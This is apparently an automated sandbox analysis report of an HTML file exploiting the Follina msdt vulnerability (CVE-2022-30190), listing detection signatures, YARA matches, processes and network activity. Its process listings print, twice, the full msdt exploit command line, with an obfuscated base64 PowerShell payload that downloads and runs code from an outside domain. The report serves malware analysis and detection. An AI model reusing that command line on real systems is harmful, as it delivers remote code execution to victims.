Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.html

Overview

General Information

Sample Name:1.html
Analysis ID:638689
MD5:ea483ab89d8b9baf00b953f0636e0520
SHA1:b0b952334f0d0195b06faed532170263f7fad6c2
SHA256:5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
Tags:Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • chrome.exe (PID: 5208 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 4368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • msdt.exe (PID: 5808 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • elevation_service.exe (PID: 5240 cmdline: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe MD5: AFD137B53BA091ACBA569255B16DF837)
    • ChromeRecovery.exe (PID: 3328 cmdline: "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system MD5: 49AC3C96D270702A27B4895E4CE1F42A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.htmlMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
  • 0x1970:$re1: location.href = "ms-msdt:
1.htmlJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
    • 0x2530:$sa1: msdt.exe
    • 0x2662:$sb2: IT_BrowseForFile=
    0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
    • 0x23f0:$sa1: msdt.exe
    • 0x242c:$sa1: msdt.exe
    • 0x2984:$sa1: msdt.exe
    • 0x3955:$sa1: msdt.exe
    • 0x2560:$sb2: IT_BrowseForFile=
    • 0x39ef:$sb2: IT_BrowseForFile=
    Process Memory Space: msdt.exe PID: 5808SUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
    • 0x1c3d:$sa1: msdt.exe
    • 0x4bf3:$sa1: msdt.exe
    • 0xc5f0:$sa1: msdt.exe
    • 0xe28c:$sa1: msdt.exe
    • 0x11277:$sa1: msdt.exe
    • 0x13e58:$sa1: msdt.exe
    • 0x15f90:$sa1: msdt.exe
    • 0x163f6:$sa1: msdt.exe
    • 0x19b26:$sa1: msdt.exe
    • 0x1c1e5:$sa1: msdt.exe
    • 0x1f1d0:$sa1: msdt.exe
    • 0x22f19:$sa1: msdt.exe
    • 0x25caa:$sa1: msdt.exe
    • 0x25cc7:$sa1: msdt.exe
    • 0x25f72:$sa1: msdt.exe
    • 0x260a6:$sa1: msdt.exe
    • 0x22fb1:$sb2: IT_BrowseForFile=
    • 0x25d61:$sb2: IT_BrowseForFile=
    • 0x26140:$sb2: IT_BrowseForFile=
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 1.htmlVirustotal: Detection: 32%Perma Link

    Exploits

    barindex
    Source: Yara matchFile source: 1.html, type: SAMPLE
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txtJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecoveryJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crxJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.jsonJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeDirectory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.jsonJump to behavior
    Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
    Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C898C3 FindFirstFileExW,
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: Ruleset Data.0.drString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
    Source: Filtering Rules.0.dr, Ruleset Data.0.drString found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
    Source: Filtering Rules.0.drString found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: ChromeRecovery.exe.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://ocsp.digicert.com0
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: elevation_service.exe, 0000001A.00000003.442311508.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441665354.0000016370DBD000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441020365.0000016370DC2000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.441039081.0000016370DBA000.00000004.00000020.00020000.00000000.sdmp, elevation_service.exe, 0000001A.00000003.444832780.0000016370DBE000.00000004.00000020.00020000.00000000.sdmp, ChromeRecovery.exe.26.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://accounts.google.com
    Source: craw_window.js.0.drString found in binary or memory: https://accounts.google.com/MergeSession
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://apis.google.com
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://clients2.google.com
    Source: manifest.json.0.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://clients2.googleusercontent.com
    Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/.
    Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
    Source: 176bd4d4-b466-471c-b2dc-78592e59bf93.tmp.1.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://dns.google
    Source: LICENSE.txt.0.drString found in binary or memory: https://easylist.to/)
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://fonts.googleapis.com
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://fonts.gstatic.com
    Source: LICENSE.txt.0.drString found in binary or memory: https://github.com/easylist)
    Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://ogs.google.com
    Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://play.google.com
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.drString found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://redirector.gvt1.com
    Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://ssl.gstatic.com
    Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://www.google.com
    Source: manifest.json.0.drString found in binary or memory: https://www.google.com/
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/cleardot.gif
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/dot2.gif
    Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/x2.gif
    Source: craw_background.js.0.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
    Source: craw_window.js.0.dr, craw_background.js.0.dr, a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://www.googleapis.com
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierra
    Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
    Source: a7329646-d142-463e-9e85-cbe79cec5f02.tmp.1.dr, 07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp.1.drString found in binary or memory: https://www.gstatic.com
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Source: unknownDNS traffic detected: queries for: clients2.google.com
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C79029 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,
    Source: 1.html, type: SAMPLEMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
    Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
    Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
    Source: Process Memory Space: msdt.exe PID: 5808, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C8C8DF
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C951B0
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C87AF1
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C9328B
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C802A1
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C94A67
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C9423B
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C944E5
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C8F428
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C93EC9
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C956B9
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C87E39
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C947AC
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C8EFA0
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: String function: 00C7FE60 appears 43 times
    Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exeCode function: 27_2_00C79D31: CreateFileW,DeviceIoControl,CloseHandle,
    Source: ChromeRecovery.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: ChromeRecovery.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: 1.htmlVirustotal: Detection: 32%
    Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
    Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exeProcess created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
